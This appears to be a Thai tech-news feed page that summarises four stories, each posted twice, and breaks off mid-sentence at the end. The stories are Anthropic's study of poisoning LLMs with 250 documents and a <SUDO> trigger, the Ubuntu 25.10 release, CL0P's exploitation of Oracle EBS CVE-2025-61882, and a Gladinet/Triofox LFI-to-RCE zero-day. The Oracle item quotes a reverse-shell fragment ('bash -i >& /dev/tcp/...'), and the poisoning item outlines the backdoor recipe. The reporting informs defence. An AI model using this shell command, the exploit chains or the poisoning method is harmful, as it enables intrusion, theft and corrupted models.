• “Anthropic พบช่องโหว่ใหม่ใน LLM — แค่ 250 เอกสารก็ฝัง backdoor ได้ทุกขนาดโมเดล”

    งานวิจัยล่าสุดจาก Anthropic ร่วมกับ UK AI Security Institute และ Alan Turing Institute เผยให้เห็นความเปราะบางของโมเดลภาษาใหญ่ (LLM) ที่หลายคนคาดไม่ถึง: การโจมตีแบบ data poisoning ไม่จำเป็นต้องควบคุมสัดส่วนของข้อมูลฝึก แต่ใช้เพียง “จำนวนเอกสารที่แน่นอน” ก็สามารถฝังพฤติกรรมแอบแฝงได้สำเร็จ

    นักวิจัยทดลองฝัง backdoor ด้วยเอกสารเพียง 250 ชิ้นในโมเดลขนาดต่าง ๆ ตั้งแต่ 600 ล้านพารามิเตอร์ไปจนถึง 13 พันล้านพารามิเตอร์ พบว่าแม้โมเดลใหญ่จะได้รับข้อมูลฝึกมากกว่า 20 เท่า แต่ก็ยังถูกฝังพฤติกรรมได้เท่า ๆ กัน แสดงให้เห็นว่า “ขนาดโมเดลไม่ส่งผลต่อความสำเร็จของการโจมตี”

    การโจมตีในงานนี้เป็นแบบ denial-of-service โดยใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว ๆ (gibberish) เมื่อเจอคำสั่งนั้น แม้จะเป็นพฤติกรรมที่ไม่อันตรายโดยตรง แต่ก็แสดงให้เห็นถึงความเป็นไปได้ในการฝังพฤติกรรมอื่นที่อันตรายกว่า เช่น การขโมยข้อมูลหรือการหลบเลี่ยงระบบความปลอดภัย

    สิ่งที่น่ากังวลคือ เอกสารที่ใช้ฝัง backdoor สามารถสร้างได้ง่าย และอาจถูกแทรกเข้าไปในข้อมูลฝึกผ่านเว็บไซต์หรือบล็อกที่เปิดสาธารณะ ซึ่งเป็นแหล่งข้อมูลหลักของโมเดล LLM ในปัจจุบัน

    แม้การโจมตีแบบนี้จะยังไม่แสดงผลในโมเดลระดับ frontier ที่มีการป้องกันสูง แต่ Anthropic เลือกเปิดเผยผลการทดลองเพื่อกระตุ้นให้เกิดการวิจัยด้านการป้องกัน และเตือนให้ผู้พัฒนาไม่ประเมินความเสี่ยงต่ำเกินไป

    ข้อมูลสำคัญจากข่าว
    งานวิจัยร่วมระหว่าง Anthropic, UK AI Security Institute และ Alan Turing Institute
    พบว่าใช้เพียง 250 เอกสารก็สามารถฝัง backdoor ได้ในโมเดลทุกขนาด
    การโจมตีใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว
    โมเดลที่ทดลองมีขนาดตั้งแต่ 600M ถึง 13B พารามิเตอร์
    การฝัง backdoor สำเร็จแม้โมเดลใหญ่จะมีข้อมูลฝึกมากกว่า 20 เท่า
    การโจมตีไม่ต้องใช้การ fine-tune สามารถวัดผลได้จาก checkpoint โดยตรง
    เอกสารที่ใช้ฝังประกอบด้วยข้อความทั่วไป + trigger + token แบบสุ่ม
    การโจมตีสำเร็จเมื่อโมเดลตอบกลับด้วย perplexity สูงเมื่อเจอ trigger

    ข้อมูลเสริมจากภายนอก
    LLM มักฝึกจากข้อมูลสาธารณะ เช่น เว็บไซต์ บล็อก และบทความ
    Backdoor คือพฤติกรรมที่ถูกฝังไว้ให้แสดงออกเมื่อเจอคำสั่งเฉพาะ
    Perplexity คือค่าที่ใช้วัดความมั่วของข้อความที่โมเดลสร้าง
    การโจมตีแบบนี้สามารถใช้เพื่อทำให้โมเดลขัดข้องหรือหลบเลี่ยงระบบตรวจสอบ
    การฝัง backdoor ผ่าน pretraining มีความเสี่ยงสูงเพราะยากต่อการตรวจสอบย้อนหลัง

    https://www.anthropic.com/research/small-samples-poison
    🧠 “Anthropic พบช่องโหว่ใหม่ใน LLM — แค่ 250 เอกสารก็ฝัง backdoor ได้ทุกขนาดโมเดล” งานวิจัยล่าสุดจาก Anthropic ร่วมกับ UK AI Security Institute และ Alan Turing Institute เผยให้เห็นความเปราะบางของโมเดลภาษาใหญ่ (LLM) ที่หลายคนคาดไม่ถึง: การโจมตีแบบ data poisoning ไม่จำเป็นต้องควบคุมสัดส่วนของข้อมูลฝึก แต่ใช้เพียง “จำนวนเอกสารที่แน่นอน” ก็สามารถฝังพฤติกรรมแอบแฝงได้สำเร็จ นักวิจัยทดลองฝัง backdoor ด้วยเอกสารเพียง 250 ชิ้นในโมเดลขนาดต่าง ๆ ตั้งแต่ 600 ล้านพารามิเตอร์ไปจนถึง 13 พันล้านพารามิเตอร์ พบว่าแม้โมเดลใหญ่จะได้รับข้อมูลฝึกมากกว่า 20 เท่า แต่ก็ยังถูกฝังพฤติกรรมได้เท่า ๆ กัน แสดงให้เห็นว่า “ขนาดโมเดลไม่ส่งผลต่อความสำเร็จของการโจมตี” การโจมตีในงานนี้เป็นแบบ denial-of-service โดยใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว ๆ (gibberish) เมื่อเจอคำสั่งนั้น แม้จะเป็นพฤติกรรมที่ไม่อันตรายโดยตรง แต่ก็แสดงให้เห็นถึงความเป็นไปได้ในการฝังพฤติกรรมอื่นที่อันตรายกว่า เช่น การขโมยข้อมูลหรือการหลบเลี่ยงระบบความปลอดภัย สิ่งที่น่ากังวลคือ เอกสารที่ใช้ฝัง backdoor สามารถสร้างได้ง่าย และอาจถูกแทรกเข้าไปในข้อมูลฝึกผ่านเว็บไซต์หรือบล็อกที่เปิดสาธารณะ ซึ่งเป็นแหล่งข้อมูลหลักของโมเดล LLM ในปัจจุบัน แม้การโจมตีแบบนี้จะยังไม่แสดงผลในโมเดลระดับ frontier ที่มีการป้องกันสูง แต่ Anthropic เลือกเปิดเผยผลการทดลองเพื่อกระตุ้นให้เกิดการวิจัยด้านการป้องกัน และเตือนให้ผู้พัฒนาไม่ประเมินความเสี่ยงต่ำเกินไป ✅ ข้อมูลสำคัญจากข่าว ➡️ งานวิจัยร่วมระหว่าง Anthropic, UK AI Security Institute และ Alan Turing Institute ➡️ พบว่าใช้เพียง 250 เอกสารก็สามารถฝัง backdoor ได้ในโมเดลทุกขนาด ➡️ การโจมตีใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว ➡️ โมเดลที่ทดลองมีขนาดตั้งแต่ 600M ถึง 13B พารามิเตอร์ ➡️ การฝัง backdoor สำเร็จแม้โมเดลใหญ่จะมีข้อมูลฝึกมากกว่า 20 เท่า ➡️ การโจมตีไม่ต้องใช้การ fine-tune สามารถวัดผลได้จาก checkpoint โดยตรง ➡️ เอกสารที่ใช้ฝังประกอบด้วยข้อความทั่วไป + trigger + token แบบสุ่ม ➡️ การโจมตีสำเร็จเมื่อโมเดลตอบกลับด้วย perplexity สูงเมื่อเจอ trigger ✅ ข้อมูลเสริมจากภายนอก ➡️ LLM มักฝึกจากข้อมูลสาธารณะ เช่น เว็บไซต์ บล็อก และบทความ ➡️ Backdoor คือพฤติกรรมที่ถูกฝังไว้ให้แสดงออกเมื่อเจอคำสั่งเฉพาะ ➡️ Perplexity คือค่าที่ใช้วัดความมั่วของข้อความที่โมเดลสร้าง ➡️ การโจมตีแบบนี้สามารถใช้เพื่อทำให้โมเดลขัดข้องหรือหลบเลี่ยงระบบตรวจสอบ ➡️ การฝัง backdoor ผ่าน pretraining มีความเสี่ยงสูงเพราะยากต่อการตรวจสอบย้อนหลัง https://www.anthropic.com/research/small-samples-poison
    WWW.ANTHROPIC.COM
    A small number of samples can poison LLMs of any size
    Anthropic research on data-poisoning attacks in large language models
    0 ความคิดเห็น 0 การแบ่งปัน 0 มุมมอง 0 รีวิว
  • “Ubuntu 25.10 ‘Questing Quokka’ มาแล้ว! เปลี่ยนโฉมด้วย Wayland, GNOME 49 และระบบความปลอดภัยจาก Rust”

    Ubuntu 25.10 โค้ดเนม “Questing Quokka” ได้เปิดตัวอย่างเป็นทางการในเดือนตุลาคม 2025 โดยเป็นเวอร์ชัน interim สุดท้ายก่อนเข้าสู่ Ubuntu 26.04 LTS ในปีหน้า การอัปเดตครั้งนี้เน้นความทันสมัย ความปลอดภัย และประสิทธิภาพที่ดีขึ้นทั้งในระดับระบบและประสบการณ์ผู้ใช้

    หนึ่งในการเปลี่ยนแปลงสำคัญคือ Ubuntu ได้ถอด X.org ออกอย่างสมบูรณ์ และใช้ Wayland เป็นระบบแสดงผลหลักสำหรับ GNOME โดยไม่มีตัวเลือกให้กลับไปใช้ X11 อีกต่อไป ซึ่งช่วยให้ภาพลื่นไหลขึ้น ลดการใช้พลังงาน และรองรับฟีเจอร์ใหม่ ๆ ได้ดีขึ้น

    Ubuntu 25.10 มาพร้อม GNOME 49 ที่ปรับปรุงหลายจุด เช่น การควบคุมเพลงจากหน้าล็อกหน้าจอ, ปรับความสว่างแยกตามจอ, การจัดการ workspace ที่แสดงบนทุกจอ และเมนู accessibility ที่เข้าถึงได้ตั้งแต่หน้าล็อกอิน

    ด้านระบบความปลอดภัย Ubuntu ได้เปลี่ยนมาใช้ sudo-rs ซึ่งเป็นเวอร์ชันใหม่ของ sudo ที่เขียนด้วยภาษา Rust เพื่อป้องกันช่องโหว่ด้านหน่วยความจำ และยังมีการนำ rust-coreutils มาใช้แทนคำสั่งพื้นฐาน เช่น ls, cp, mv เพื่อเพิ่มความปลอดภัยและเสถียรภาพ

    นอกจากนี้ยังมีการเปลี่ยนแปลงแอปเริ่มต้น เช่น Ptyxis มาแทน GNOME Terminal ซึ่งรองรับ container workflows ได้ดีขึ้น และ Loupe มาแทน Eye of GNOME สำหรับดูภาพแบบ sandboxed และใช้ GPU ช่วยเรนเดอร์

    ระบบบูตเปลี่ยนมาใช้ Dracut แทน initramfs-tools เพื่อความเสถียรและความเร็วในการบูต พร้อม Linux Kernel 6.17 ที่รองรับฮาร์ดแวร์ใหม่ ๆ เช่น Intel Arc Pro B60 และ Xe3 iGPU

    Ubuntu 25.10 จะได้รับการสนับสนุนเป็นเวลา 9 เดือนจนถึงกรกฎาคม 2026 และเหมาะสำหรับผู้ใช้ที่ต้องการฟีเจอร์ใหม่ก่อนเวอร์ชัน LTS จะมาถึง

    ข้อมูลสำคัญจากข่าว
    Ubuntu 25.10 โค้ดเนม “Questing Quokka” เปิดตัวในเดือนตุลาคม 2025
    ใช้ Wayland เป็นระบบแสดงผลหลักแทน X.org อย่างถาวร
    มาพร้อม GNOME 49 ที่ปรับปรุง UI และ accessibility
    เปลี่ยนมาใช้ sudo-rs และ rust-coreutils เพื่อความปลอดภัย
    เปลี่ยนแอปเริ่มต้นเป็น Ptyxis (terminal) และ Loupe (image viewer)
    ใช้ Dracut เป็นระบบ initramfs ใหม่แทน initramfs-tools
    ใช้ Linux Kernel 6.17 รองรับฮาร์ดแวร์ใหม่ เช่น Intel Arc Pro B60
    รองรับ TPM-backed Full Disk Encryption แบบใหม่
    รองรับ RISC-V และ ARM พร้อม nested virtualization
    ได้รับการสนับสนุน 9 เดือน จนถึงกรกฎาคม 2026

    ข้อมูลเสริมจากภายนอก
    Wayland ให้ภาพลื่นไหลและปลอดภัยกว่า X11 โดยไม่มีการแชร์ buffer ระหว่างแอป
    Rust เป็นภาษาที่เน้นความปลอดภัยด้านหน่วยความจำ ลดช่องโหว่ buffer overflow
    Dracut ใช้ใน Fedora และ RHEL มานาน มีความเสถียรสูงในการบูตระบบ
    TPM-backed FDE ช่วยให้การเข้ารหัสดิสก์ปลอดภัยขึ้น โดยใช้ชิป TPM ในเครื่อง
    GNOME 49 เพิ่มฟีเจอร์ควบคุมเพลงจากหน้าล็อก และปรับความสว่างแยกจอ

    https://news.itsfoss.com/ubuntu-25-10-release/
    🐾 “Ubuntu 25.10 ‘Questing Quokka’ มาแล้ว! เปลี่ยนโฉมด้วย Wayland, GNOME 49 และระบบความปลอดภัยจาก Rust” Ubuntu 25.10 โค้ดเนม “Questing Quokka” ได้เปิดตัวอย่างเป็นทางการในเดือนตุลาคม 2025 โดยเป็นเวอร์ชัน interim สุดท้ายก่อนเข้าสู่ Ubuntu 26.04 LTS ในปีหน้า การอัปเดตครั้งนี้เน้นความทันสมัย ความปลอดภัย และประสิทธิภาพที่ดีขึ้นทั้งในระดับระบบและประสบการณ์ผู้ใช้ หนึ่งในการเปลี่ยนแปลงสำคัญคือ Ubuntu ได้ถอด X.org ออกอย่างสมบูรณ์ และใช้ Wayland เป็นระบบแสดงผลหลักสำหรับ GNOME โดยไม่มีตัวเลือกให้กลับไปใช้ X11 อีกต่อไป ซึ่งช่วยให้ภาพลื่นไหลขึ้น ลดการใช้พลังงาน และรองรับฟีเจอร์ใหม่ ๆ ได้ดีขึ้น Ubuntu 25.10 มาพร้อม GNOME 49 ที่ปรับปรุงหลายจุด เช่น การควบคุมเพลงจากหน้าล็อกหน้าจอ, ปรับความสว่างแยกตามจอ, การจัดการ workspace ที่แสดงบนทุกจอ และเมนู accessibility ที่เข้าถึงได้ตั้งแต่หน้าล็อกอิน ด้านระบบความปลอดภัย Ubuntu ได้เปลี่ยนมาใช้ sudo-rs ซึ่งเป็นเวอร์ชันใหม่ของ sudo ที่เขียนด้วยภาษา Rust เพื่อป้องกันช่องโหว่ด้านหน่วยความจำ และยังมีการนำ rust-coreutils มาใช้แทนคำสั่งพื้นฐาน เช่น ls, cp, mv เพื่อเพิ่มความปลอดภัยและเสถียรภาพ นอกจากนี้ยังมีการเปลี่ยนแปลงแอปเริ่มต้น เช่น Ptyxis มาแทน GNOME Terminal ซึ่งรองรับ container workflows ได้ดีขึ้น และ Loupe มาแทน Eye of GNOME สำหรับดูภาพแบบ sandboxed และใช้ GPU ช่วยเรนเดอร์ ระบบบูตเปลี่ยนมาใช้ Dracut แทน initramfs-tools เพื่อความเสถียรและความเร็วในการบูต พร้อม Linux Kernel 6.17 ที่รองรับฮาร์ดแวร์ใหม่ ๆ เช่น Intel Arc Pro B60 และ Xe3 iGPU Ubuntu 25.10 จะได้รับการสนับสนุนเป็นเวลา 9 เดือนจนถึงกรกฎาคม 2026 และเหมาะสำหรับผู้ใช้ที่ต้องการฟีเจอร์ใหม่ก่อนเวอร์ชัน LTS จะมาถึง ✅ ข้อมูลสำคัญจากข่าว ➡️ Ubuntu 25.10 โค้ดเนม “Questing Quokka” เปิดตัวในเดือนตุลาคม 2025 ➡️ ใช้ Wayland เป็นระบบแสดงผลหลักแทน X.org อย่างถาวร ➡️ มาพร้อม GNOME 49 ที่ปรับปรุง UI และ accessibility ➡️ เปลี่ยนมาใช้ sudo-rs และ rust-coreutils เพื่อความปลอดภัย ➡️ เปลี่ยนแอปเริ่มต้นเป็น Ptyxis (terminal) และ Loupe (image viewer) ➡️ ใช้ Dracut เป็นระบบ initramfs ใหม่แทน initramfs-tools ➡️ ใช้ Linux Kernel 6.17 รองรับฮาร์ดแวร์ใหม่ เช่น Intel Arc Pro B60 ➡️ รองรับ TPM-backed Full Disk Encryption แบบใหม่ ➡️ รองรับ RISC-V และ ARM พร้อม nested virtualization ➡️ ได้รับการสนับสนุน 9 เดือน จนถึงกรกฎาคม 2026 ✅ ข้อมูลเสริมจากภายนอก ➡️ Wayland ให้ภาพลื่นไหลและปลอดภัยกว่า X11 โดยไม่มีการแชร์ buffer ระหว่างแอป ➡️ Rust เป็นภาษาที่เน้นความปลอดภัยด้านหน่วยความจำ ลดช่องโหว่ buffer overflow ➡️ Dracut ใช้ใน Fedora และ RHEL มานาน มีความเสถียรสูงในการบูตระบบ ➡️ TPM-backed FDE ช่วยให้การเข้ารหัสดิสก์ปลอดภัยขึ้น โดยใช้ชิป TPM ในเครื่อง ➡️ GNOME 49 เพิ่มฟีเจอร์ควบคุมเพลงจากหน้าล็อก และปรับความสว่างแยกจอ https://news.itsfoss.com/ubuntu-25-10-release/
    NEWS.ITSFOSS.COM
    Ubuntu 25.10 is Out: Here Are the Biggest Changes You'll Notice
    X.org removed, new default apps, Linux 6.17, and GNOME 49.
    0 ความคิดเห็น 0 การแบ่งปัน 4 มุมมอง 0 รีวิว
  • “CL0P โจมตี Oracle EBS ด้วยช่องโหว่ Zero-Day CVE-2025-61882 — ขโมยข้อมูลองค์กรผ่าน RCE โดยไม่ต้องล็อกอิน”

    Google Threat Intelligence Group (GTIG) และ Mandiant ได้เปิดเผยแคมเปญการโจมตีขนาดใหญ่โดยกลุ่ม CL0P ที่มุ่งเป้าไปยัง Oracle E-Business Suite (EBS) ซึ่งเป็นระบบ ERP ที่ใช้กันอย่างแพร่หลายในองค์กรทั่วโลก โดยใช้ช่องโหว่ Zero-Day ที่เพิ่งถูกระบุว่าเป็น CVE-2025-61882 ซึ่งมีความรุนแรงระดับ “วิกฤต” ด้วยคะแนน CVSS 9.8

    การโจมตีเริ่มต้นตั้งแต่เดือนกรกฎาคม 2025 โดยแฮกเกอร์สามารถเข้าถึงระบบ Oracle EBS ได้โดยไม่ต้องล็อกอิน ผ่านช่องโหว่ในคอมโพเนนต์ BI Publisher Integration ของระบบ Concurrent Processing โดยใช้เทคนิค SSRF, CRLF injection, การข้ามการยืนยันตัวตน และการฉีด XSL template เพื่อรันคำสั่งบนเซิร์ฟเวอร์

    เมื่อเข้าระบบได้แล้ว ผู้โจมตีใช้ payload แบบ Java ที่ซับซ้อน เช่น GOLDVEIN.JAVA และ SAGEGIFT/SAGELEAF/SAGEWAVE เพื่อสร้าง backdoor และควบคุมระบบอย่างต่อเนื่อง โดย payload เหล่านี้สามารถหลบเลี่ยงการตรวจจับจากระบบป้องกันทั่วไปได้

    แฮกเกอร์ใช้บัญชี “applmgr” ซึ่งเป็นบัญชีหลักของ Oracle EBS ในการสำรวจระบบและรันคำสั่ง เช่น ifconfig, netstat, และ bash -i >& /dev/tcp/... เพื่อเปิด shell แบบ interactive บนเซิร์ฟเวอร์

    ในช่วงปลายเดือนกันยายน ผู้บริหารจากหลายองค์กรเริ่มได้รับอีเมลข่มขู่จาก CL0P โดยอ้างว่าข้อมูลจากระบบ Oracle EBS ถูกขโมยไปแล้ว พร้อมแนบรายการไฟล์จริงเพื่อยืนยันการโจมตี และเสนอให้จ่ายเงินเพื่อไม่ให้ข้อมูลถูกเผยแพร่บนเว็บไซต์ CL0P DLS

    Oracle ได้ออก patch ฉุกเฉินเมื่อวันที่ 4 ตุลาคม 2025 เพื่อแก้ไขช่องโหว่ CVE-2025-61882 และแนะนำให้ลูกค้าทุกคนอัปเดตทันที พร้อมแจก Indicators of Compromise (IoCs) เพื่อช่วยตรวจสอบการบุกรุก

    ข้อมูลสำคัญจากข่าว
    ช่องโหว่ CVE-2025-61882 เป็น Zero-Day ใน Oracle EBS ที่ถูกใช้โจมตีโดย CL0P
    ช่องโหว่เกิดใน BI Publisher Integration ของ Concurrent Processing
    ใช้เทคนิค SSRF, CRLF injection, auth bypass และ XSL template injection
    แฮกเกอร์สามารถรันคำสั่งบนเซิร์ฟเวอร์โดยไม่ต้องล็อกอิน
    ใช้ payload Java เช่น GOLDVEIN.JAVA และ SAGE* เพื่อสร้าง backdoor
    ใช้บัญชี applmgr เพื่อสำรวจระบบและเปิด shell
    ส่งอีเมลข่มขู่ผู้บริหารพร้อมรายการไฟล์จริงจากระบบที่ถูกเจาะ
    Oracle ออก patch ฉุกเฉินเมื่อ 4 ตุลาคม 2025 พร้อมแจก IoCs

    ข้อมูลเสริมจากภายนอก
    Oracle EBS ใช้ในระบบสำคัญขององค์กร เช่น การเงิน, HR, โลจิสติกส์
    CL0P เคยโจมตี MOVEit, Cleo และ GoAnywhere ด้วย Zero-Day ลักษณะเดียวกัน
    SSRF เป็นเทคนิคที่ใช้หลอกให้เซิร์ฟเวอร์เรียกข้อมูลจากแหล่งที่ผู้โจมตีควบคุม
    XSLT injection สามารถใช้เรียกฟังก์ชัน Java เพื่อรันคำสั่งในระบบ
    GOLDVEIN.JAVA ใช้การปลอม handshake TLS เพื่อหลบการตรวจจับ

    https://securityonline.info/cl0p-extortion-google-mandiant-expose-zero-day-rce-in-oracle-e-business-suite-cve-2025-61882/

    💥 “CL0P โจมตี Oracle EBS ด้วยช่องโหว่ Zero-Day CVE-2025-61882 — ขโมยข้อมูลองค์กรผ่าน RCE โดยไม่ต้องล็อกอิน” Google Threat Intelligence Group (GTIG) และ Mandiant ได้เปิดเผยแคมเปญการโจมตีขนาดใหญ่โดยกลุ่ม CL0P ที่มุ่งเป้าไปยัง Oracle E-Business Suite (EBS) ซึ่งเป็นระบบ ERP ที่ใช้กันอย่างแพร่หลายในองค์กรทั่วโลก โดยใช้ช่องโหว่ Zero-Day ที่เพิ่งถูกระบุว่าเป็น CVE-2025-61882 ซึ่งมีความรุนแรงระดับ “วิกฤต” ด้วยคะแนน CVSS 9.8 การโจมตีเริ่มต้นตั้งแต่เดือนกรกฎาคม 2025 โดยแฮกเกอร์สามารถเข้าถึงระบบ Oracle EBS ได้โดยไม่ต้องล็อกอิน ผ่านช่องโหว่ในคอมโพเนนต์ BI Publisher Integration ของระบบ Concurrent Processing โดยใช้เทคนิค SSRF, CRLF injection, การข้ามการยืนยันตัวตน และการฉีด XSL template เพื่อรันคำสั่งบนเซิร์ฟเวอร์ เมื่อเข้าระบบได้แล้ว ผู้โจมตีใช้ payload แบบ Java ที่ซับซ้อน เช่น GOLDVEIN.JAVA และ SAGEGIFT/SAGELEAF/SAGEWAVE เพื่อสร้าง backdoor และควบคุมระบบอย่างต่อเนื่อง โดย payload เหล่านี้สามารถหลบเลี่ยงการตรวจจับจากระบบป้องกันทั่วไปได้ แฮกเกอร์ใช้บัญชี “applmgr” ซึ่งเป็นบัญชีหลักของ Oracle EBS ในการสำรวจระบบและรันคำสั่ง เช่น ifconfig, netstat, และ bash -i >& /dev/tcp/... เพื่อเปิด shell แบบ interactive บนเซิร์ฟเวอร์ ในช่วงปลายเดือนกันยายน ผู้บริหารจากหลายองค์กรเริ่มได้รับอีเมลข่มขู่จาก CL0P โดยอ้างว่าข้อมูลจากระบบ Oracle EBS ถูกขโมยไปแล้ว พร้อมแนบรายการไฟล์จริงเพื่อยืนยันการโจมตี และเสนอให้จ่ายเงินเพื่อไม่ให้ข้อมูลถูกเผยแพร่บนเว็บไซต์ CL0P DLS Oracle ได้ออก patch ฉุกเฉินเมื่อวันที่ 4 ตุลาคม 2025 เพื่อแก้ไขช่องโหว่ CVE-2025-61882 และแนะนำให้ลูกค้าทุกคนอัปเดตทันที พร้อมแจก Indicators of Compromise (IoCs) เพื่อช่วยตรวจสอบการบุกรุก ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-61882 เป็น Zero-Day ใน Oracle EBS ที่ถูกใช้โจมตีโดย CL0P ➡️ ช่องโหว่เกิดใน BI Publisher Integration ของ Concurrent Processing ➡️ ใช้เทคนิค SSRF, CRLF injection, auth bypass และ XSL template injection ➡️ แฮกเกอร์สามารถรันคำสั่งบนเซิร์ฟเวอร์โดยไม่ต้องล็อกอิน ➡️ ใช้ payload Java เช่น GOLDVEIN.JAVA และ SAGE* เพื่อสร้าง backdoor ➡️ ใช้บัญชี applmgr เพื่อสำรวจระบบและเปิด shell ➡️ ส่งอีเมลข่มขู่ผู้บริหารพร้อมรายการไฟล์จริงจากระบบที่ถูกเจาะ ➡️ Oracle ออก patch ฉุกเฉินเมื่อ 4 ตุลาคม 2025 พร้อมแจก IoCs ✅ ข้อมูลเสริมจากภายนอก ➡️ Oracle EBS ใช้ในระบบสำคัญขององค์กร เช่น การเงิน, HR, โลจิสติกส์ ➡️ CL0P เคยโจมตี MOVEit, Cleo และ GoAnywhere ด้วย Zero-Day ลักษณะเดียวกัน ➡️ SSRF เป็นเทคนิคที่ใช้หลอกให้เซิร์ฟเวอร์เรียกข้อมูลจากแหล่งที่ผู้โจมตีควบคุม ➡️ XSLT injection สามารถใช้เรียกฟังก์ชัน Java เพื่อรันคำสั่งในระบบ ➡️ GOLDVEIN.JAVA ใช้การปลอม handshake TLS เพื่อหลบการตรวจจับ https://securityonline.info/cl0p-extortion-google-mandiant-expose-zero-day-rce-in-oracle-e-business-suite-cve-2025-61882/
    SECURITYONLINE.INFO
    CL0P Extortion: Google/Mandiant Expose Zero-Day RCE in Oracle E-Business Suite (CVE-2025-61882)
    Google/Mandiant linked CL0P extortion to a Zero-Day RCE flaw (CVE-2025-61882) in Oracle E-Business Suite. Attackers exploited the bug since July to steal corporate data and deploy GOLDVEIN Java shells.
    0 ความคิดเห็น 0 การแบ่งปัน 5 มุมมอง 0 รีวิว
  • “พบช่องโหว่ Zero-Day ร้ายแรงใน Gladinet/Triofox — แฮกเกอร์ใช้ LFI ดึง machine key แล้วรันโค้ดบนเซิร์ฟเวอร์ทันที”

    บริษัท Huntress ได้ออกคำเตือนถึงช่องโหว่ Zero-Day ใหม่ในซอฟต์แวร์ Gladinet CentreStack และ Triofox ซึ่งเป็นแพลตฟอร์มแชร์ไฟล์และจัดการข้อมูลสำหรับองค์กร โดยช่องโหว่นี้ถูกระบุว่าเป็น CVE-2025-11371 และมีระดับความรุนแรง CVSS 6.1 ซึ่งแม้จะไม่สูงสุด แต่มีการโจมตีจริงแล้วในหลายองค์กร

    ช่องโหว่นี้เป็นแบบ Local File Inclusion (LFI) ที่เปิดให้ผู้โจมตีสามารถเข้าถึงไฟล์สำคัญในระบบได้โดยไม่ต้องยืนยันตัวตน โดยเฉพาะไฟล์ Web.config ที่เก็บ machine key ซึ่งเป็นกุญแจสำคัญในการเข้ารหัสข้อมูลในระบบ ASP.NET

    เมื่อแฮกเกอร์ได้ machine key แล้ว จะสามารถใช้ช่องโหว่เก่า CVE-2025-30406 ที่เกี่ยวข้องกับ ViewState deserialization เพื่อสร้าง payload ที่ผ่านการเข้ารหัสอย่างถูกต้อง แล้วรันคำสั่งบนเซิร์ฟเวอร์ได้ทันที โดยไม่ต้อง login หรือมีสิทธิ์ใด ๆ

    Huntress ตรวจพบการโจมตีครั้งแรกเมื่อวันที่ 26 กันยายน 2025 ผ่านระบบตรวจจับภายใน โดยพบ payload แบบ base64 ถูกเรียกใช้เป็น child process ของ web server ซึ่งเป็นสัญญาณของการโจมตีหลังการ deserialization

    แม้ช่องโหว่ CVE-2025-30406 จะถูกแก้ไขไปแล้วในเวอร์ชันใหม่ของ CentreStack แต่ช่องโหว่ CVE-2025-11371 กลับเปิดทางให้แฮกเกอร์ใช้ช่องโหว่เก่าได้อีกครั้งผ่านการดึง machine key ทำให้การโจมตีมีประสิทธิภาพสูงและยากต่อการตรวจจับ

    ขณะนี้ยังไม่มี patch อย่างเป็นทางการจาก Gladinet แต่ Huntress ได้เสนอวิธีแก้ไขชั่วคราว โดยให้ผู้ดูแลระบบเข้าไปลบ handler ที่ชื่อ t.dn ในไฟล์ Web.config ของ UploadDownloadProxy เพื่อปิดช่องทางการเข้าถึงที่ใช้ในการโจมตี

    ข้อมูลสำคัญจากข่าว
    ช่องโหว่ CVE-2025-11371 เป็นแบบ Local File Inclusion (LFI) ใน Gladinet CentreStack และ Triofox
    ผู้โจมตีสามารถดึงไฟล์ Web.config เพื่อขโมย machine key โดยไม่ต้อง login
    ใช้ machine key เพื่อรันโค้ดผ่านช่องโหว่ ViewState deserialization (CVE-2025-30406)
    Huntress ตรวจพบการโจมตีจริงใน 3 องค์กรแล้ว
    การโจมตีเริ่มจาก payload base64 ที่รันเป็น child process ของ web server
    ช่องโหว่ CVE-2025-30406 เคยถูกแก้ไขแล้ว แต่ถูกนำกลับมาใช้ผ่านช่องโหว่ใหม่
    ยังไม่มี patch อย่างเป็นทางการจาก Gladinet
    Huntress แนะนำให้ลบ handler t.dn ใน Web.config เพื่อปิดช่องทางการโจมตี

    ข้อมูลเสริมจากภายนอก
    ViewState เป็นกลไกของ ASP.NET ที่ใช้เก็บสถานะของหน้าเว็บ
    Deserialization คือการแปลงข้อมูลกลับเป็น object ซึ่งหากไม่ปลอดภัยอาจถูกใช้โจมตี
    LFI เป็นช่องโหว่ที่เปิดให้ผู้โจมตีอ่านไฟล์ในระบบโดยไม่ต้องมีสิทธิ์
    Machine key ใช้ในการเข้ารหัสข้อมูลสำคัญ เช่น session และ ViewState
    การโจมตีแบบนี้สามารถใช้เพื่อฝังมัลแวร์หรือเปิด backdoor บนเซิร์ฟเวอร์

    https://securityonline.info/exploited-zero-day-gladinet-triofox-flaw-cve-2025-11371-allows-rce-via-lfi/
    🕵️ “พบช่องโหว่ Zero-Day ร้ายแรงใน Gladinet/Triofox — แฮกเกอร์ใช้ LFI ดึง machine key แล้วรันโค้ดบนเซิร์ฟเวอร์ทันที” บริษัท Huntress ได้ออกคำเตือนถึงช่องโหว่ Zero-Day ใหม่ในซอฟต์แวร์ Gladinet CentreStack และ Triofox ซึ่งเป็นแพลตฟอร์มแชร์ไฟล์และจัดการข้อมูลสำหรับองค์กร โดยช่องโหว่นี้ถูกระบุว่าเป็น CVE-2025-11371 และมีระดับความรุนแรง CVSS 6.1 ซึ่งแม้จะไม่สูงสุด แต่มีการโจมตีจริงแล้วในหลายองค์กร ช่องโหว่นี้เป็นแบบ Local File Inclusion (LFI) ที่เปิดให้ผู้โจมตีสามารถเข้าถึงไฟล์สำคัญในระบบได้โดยไม่ต้องยืนยันตัวตน โดยเฉพาะไฟล์ Web.config ที่เก็บ machine key ซึ่งเป็นกุญแจสำคัญในการเข้ารหัสข้อมูลในระบบ ASP.NET เมื่อแฮกเกอร์ได้ machine key แล้ว จะสามารถใช้ช่องโหว่เก่า CVE-2025-30406 ที่เกี่ยวข้องกับ ViewState deserialization เพื่อสร้าง payload ที่ผ่านการเข้ารหัสอย่างถูกต้อง แล้วรันคำสั่งบนเซิร์ฟเวอร์ได้ทันที โดยไม่ต้อง login หรือมีสิทธิ์ใด ๆ Huntress ตรวจพบการโจมตีครั้งแรกเมื่อวันที่ 26 กันยายน 2025 ผ่านระบบตรวจจับภายใน โดยพบ payload แบบ base64 